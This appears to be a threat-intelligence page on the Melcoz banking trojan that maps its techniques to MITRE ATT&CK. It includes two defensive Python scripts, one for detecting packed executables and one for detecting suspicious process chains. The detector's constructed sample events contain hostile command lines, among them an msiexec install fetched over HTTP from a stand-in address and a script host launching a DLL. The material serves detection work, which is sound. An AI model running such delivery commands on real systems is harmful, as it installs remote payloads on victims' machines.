
Melcoz

Melcoz is a Brazilian banking trojan associated with the "Tetrade" cluster identified by Kaspersky, alongside Grandoreiro, Guildma, and Ousaban/Javali. The malware targets Windows systems and is focused on online banking fraud. Reported capabilities include monitoring clipboard contents, stealing credentials from web browsers, monitoring the victim's browser for online banking sessions, and displaying an overlay window to manipulate banking sessions in the background. Observed execution and delivery methods include malicious links embedded in emails, MSI files with embedded VBScript, VBS scripts used to execute malicious DLLs, and distribution via an AutoIt loader script. Melcoz samples have also been packed with VMProtect and Themida to hinder analysis and evade detection.


MITRE ATT&CK

Techniques & procedures

13 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1566.002 Spearphishing Link (Evidence: 2)

Multiple actors and malware families are described as sending spearphishing/phishing emails containing malicious links (including shortened URLs, cloud-hosted links, and links to archives or documents) to deliver malware, harvest credentials, or redirect victims to malicious content.

Execution

4 techniques

T1059 Command and Scripting Interpreter (Evidence: 1)

APT37 has used Ruby scripts to execute payloads.

T1059.005 Visual Basic (Evidence: 2)

The content repeatedly describes threat actors and malware using VBScript, VBS, VBA macros, and Visual Basic code for execution, payload delivery, persistence, reconnaissance, and command execution.

T1059.010 AutoHotKey & AutoIT (Evidence: 2)

APT39 has utilized AutoIt and custom scripts to perform internal reconnaissance. Melcoz has been distributed through an AutoIt loader script.

T1204.001 Malicious Link (Evidence: 1)

Defense Evasion

3 techniques
T1027.002 Software Packing (Evidence: 2)

"Sandworm Team used UPX to pack a copy of Mimikatz"; "APT38 has used several code packing methods such as Themida, Enigma, VMProtect, and Obsidium"; "Lazarus Group packed malicious .db files with Themida to evade detection."
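Commercial protectors such as VMProtect and Themida leave measurable traces in the PE section table: very high byte entropy in the protected sections, sections that are empty on disk but large in memory, and, unless the operator renames them, recognisable section names. The triage script below is an added example, not code from this page or from the Tetrade research it summarises. It parses the section table by hand (no pefile dependency), scores each section by entropy and by name, and builds a small constructed PE so it can be run offline. The section-name hints, the 7.0 bits-per-byte threshold and the sample binary are assumptions for illustration; treat a hit as a reason to unpack and look closer, not as a verdict.

```python
import hashlib
import math
import struct

# Heuristic section-name hints. VMProtect defaults to ".vmp0"/".vmp1", Themida to
# ".themida", UPX to "UPX0"/"UPX1". All can be renamed by whoever packs the file,
# so this is an assumption of default settings, not a signature.
PACKER_SECTION_HINTS = {".vmp": "VMProtect", ".themida": "Themida", "upx": "UPX"}
ENTROPY_THRESHOLD = 7.0  # bits per byte; plain x86 code normally sits well below 6.5


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk the COFF header and the section table of a PE32 or PE32+ image."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + opt_size            # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40                # IMAGE_SECTION_HEADER is 40 bytes
        name_raw, vsize, _vaddr, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, off)
        data = pe[raw_ptr:raw_ptr + raw_size] if raw_size else b""
        sections.append({
            "name": name_raw.rstrip(b"\0").decode("latin-1"),
            "virtual_size": vsize,
            "raw_size": raw_size,
            "entropy": shannon_entropy(data),
        })
    return sections


def assess_packing(pe: bytes, threshold: float = ENTROPY_THRESHOLD) -> list:
    """Return [(section_name, [reasons...])] for sections that look packed or protected."""
    findings = []
    for s in parse_sections(pe):
        reasons = []
        for prefix, packer in PACKER_SECTION_HINTS.items():
            if s["name"].lower().startswith(prefix):
                reasons.append(f"section name suggests {packer}")
        if s["raw_size"] and s["entropy"] >= threshold:
            reasons.append(f"entropy {s['entropy']:.2f} >= {threshold}")
        if s["raw_size"] == 0 and s["virtual_size"] > 0:
            reasons.append("no raw data but non-zero virtual size (filled at runtime)")
        if reasons:
            findings.append((s["name"], reasons))
    return findings


def build_sample_pe(sections: list) -> bytes:
    """Construct a minimal PE-shaped byte string (DOS stub, COFF header, zeroed optional
    header, section table, raw data). It is not executable; it only exercises the parser."""
    e_lfanew, opt_size = 0x40, 0xE0         # PE32 optional header size, zero-filled here
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    raw_ptr = e_lfanew + 4 + 20 + opt_size + 40 * len(sections)
    table, body = b"", b""
    for name, data, vsize in sections:
        table += struct.pack("<8sIIIIIIHHI", name.encode(), vsize, 0x1000,
                             len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data
        raw_ptr += len(data)
    return dos + b"PE\0\0" + coff + b"\0" * opt_size + table + body


# Constructed sample: a low-entropy code section plus two VMProtect-style sections.
_LOW_ENTROPY_CODE = b"\x55\x8b\xec\x83\xec\x10\xc3" * 300
_HIGH_ENTROPY_BLOB = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(128))
SAMPLE_PE = build_sample_pe([
    (".text", _LOW_ENTROPY_CODE, len(_LOW_ENTROPY_CODE)),
    (".vmp0", b"", 0x20000),                # empty on disk, populated when unpacked
    (".vmp1", _HIGH_ENTROPY_BLOB, len(_HIGH_ENTROPY_BLOB)),
])

if __name__ == "__main__":
    for name, reasons in assess_packing(SAMPLE_PE):
        print(f"{name:10s} {'; '.join(reasons)}")
```

Entropy alone also flags legitimately compressed resources and encrypted data blobs, so the name hint and the empty-on-disk check are there to raise confidence rather than to replace an unpacking step.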

T1218.007 Msiexec (Evidence: 2)

“AppleJeus delivered components using a Windows Installer package (.msi)… executed the 3CXDesktopApp.exe…”, “APT38 has used msiexec.exe to execute malicious files.”, “Rancor has used msiexec to download and execute malicious installer files over HTTP.”, “TA505 has used msiexec to download and execute malicious Windows Installer files.”
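The delivery chain this page describes (an MSI carrying VBScript, a script host that runs a DLL, an AutoIt loader, or msiexec pulling a package over HTTP) shows up in process-creation telemetry even when the final payload is packed. The script below is an added example, not code from this page or from any Melcoz report: it evaluates Sysmon-style process-creation records for the parent/child relationships that correspond to T1218.007, T1059.005 and T1059.010 and renders the ancestry of each hit for the analyst. The events, pids, file names, paths and the 198.51.100.7 address are constructed for illustration.

```python
import ntpath
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DLL_LOADERS = {"rundll32.exe", "regsvr32.exe"}
AUTOIT_SCRIPT = re.compile(r'\.(au3|a3x)(\s|$|")', re.I)
REMOTE_MSI = re.compile(r"https?://", re.I)
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(downloads|appdata)\\|\\programdata\\|\\windows\\temp\\", re.I)


def image_name(path: str) -> str:
    return ntpath.basename(path).lower()


def lineage(events: list, pid: int) -> str:
    """Walk parent pointers and render 'ancestor > ... > process' for a hit."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:     # seen-set guards against pid reuse loops
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return " > ".join(reversed(chain))


def detect(events: list) -> list:
    """Return (pid, technique_ids, description) for records matching the chains below."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        img, cmd = image_name(e["image"]), e["cmdline"]
        parent = by_pid.get(e["ppid"])
        pimg = image_name(parent["image"]) if parent else ""
        # MSI whose custom action launches a script host: msiexec.exe -> wscript/cscript
        if pimg == "msiexec.exe" and img in SCRIPT_HOSTS:
            hits.append((e["pid"], "T1218.007/T1059.005",
                         "msiexec.exe spawned a script host: MSI with embedded VBScript"))
        # VBS that hands off to a DLL through rundll32/regsvr32
        if pimg in SCRIPT_HOSTS and img in DLL_LOADERS:
            where = " from a user-writable path" if USER_WRITABLE.search(cmd) else ""
            hits.append((e["pid"], "T1059.005",
                         f"script host launched {img} to run a DLL{where}"))
        # AutoIt interpreter with a script argument. Compiled AutoIt stubs keep any
        # name, so this only catches the interpreter form of the loader.
        if img.startswith("autoit3") or AUTOIT_SCRIPT.search(cmd):
            hits.append((e["pid"], "T1059.010", "AutoIt interpreter executing a script"))
        # msiexec installing a package fetched over HTTP(S)
        if img == "msiexec.exe" and REMOTE_MSI.search(cmd):
            hits.append((e["pid"], "T1218.007",
                         "msiexec.exe installing a package fetched over HTTP(S)"))
    return hits


# Constructed Sysmon-style EventID 1 records; pids, paths and names are invented.
SAMPLE_EVENTS = [
    {"pid": 3500, "ppid": 1200, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4012, "ppid": 3500, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\Fatura.msi /qn"},
    {"pid": 4088, "ppid": 4012, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe //B C:\Users\alice\AppData\Local\Temp\run.vbs"},
    {"pid": 4120, "ppid": 4088, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Roaming\core.dll,Start"},
    {"pid": 4200, "ppid": 3500, "image": r"C:\Users\alice\AppData\Roaming\au\AutoIt3.exe",
     "cmdline": r'"C:\Users\alice\AppData\Roaming\au\AutoIt3.exe" stage.a3x'},
    {"pid": 4300, "ppid": 3500, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": "msiexec.exe /i http://198.51.100.7/update.msi /quiet"},
    {"pid": 5000, "ppid": 3500, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript.exe C:\Scripts\logon.vbs"},        # benign: explorer-launched
]

if __name__ == "__main__":
    for pid, technique, why in detect(SAMPLE_EVENTS):
        print(f"pid {pid} [{technique}] {why}\n    chain: {lineage(SAMPLE_EVENTS, pid)}")
```

The parent/child pairing is what keeps the false-positive rate tolerable: wscript.exe on its own is everywhere in enterprise logon scripts (the last constructed record is exactly that and produces no hit), but msiexec.exe spawning a script host, or a script host spawning rundll32.exe with a DLL under AppData, is rare enough to page on.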

T1574.001 DLL (Evidence: 2)

"AppleJeus ... has also used DLL search order hijacking via the IKEEXT service, running with LocalSystem privileges, to load the TAXHAUL DLL for persistence." / "APT41 ... has used search order hijacking to execute malicious payloads" / "Cinnamon Tempest has used search order hijacking to launch Cobalt Strike Beacons."

Credential Access

1 technique
T1555.003 Credentials from Web Browsers (Evidence: 5)

The content repeatedly describes threat actors and malware stealing usernames, passwords, cookies, session tokens, and other saved credentials from web browsers such as Chrome, Firefox, Internet Explorer, Edge, Opera, Safari, and Yandex.

Collection

2 techniques
T1115 Clipboard Data (Evidence: 3)

Agent Tesla can steal data from the victim’s clipboard. APT38 used a Trojan called KEYLIME to collect data from the clipboard. APT39 has used tools capable of stealing contents of the clipboard.

T1185 Browser Session Hijacking (Evidence: 2)

Cobalt Strike can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates. Dridex can perform browser attacks via web injects to steal information such as credentials, certificates, and cookies. Grandoreiro can monitor browser activity for online banking actions and display full-screen overlay images to block user access to the intended site or present additional data fields. IcedID has used web injection attacks to redirect victims to spoofed sites designed to harvest banking and other credentials. Melcoz can monitor the victim's browser for online banking sessions and display an overlay window to manipulate the session in the background. QakBot can use advanced web injects to steal web banking credentials. TrickBot uses web injects and browser redirection to trick the user into providing their login credentials on a fake or modified web page. Ursnif has injected HTML codes into banking sites to steal sensitive online banking information.

Command and Control

1 technique
T1105 Ingress Tool Transfer (Evidence: 1)

Impact

1 technique
T1565.002 Transmitted Data Manipulation (Evidence: 1)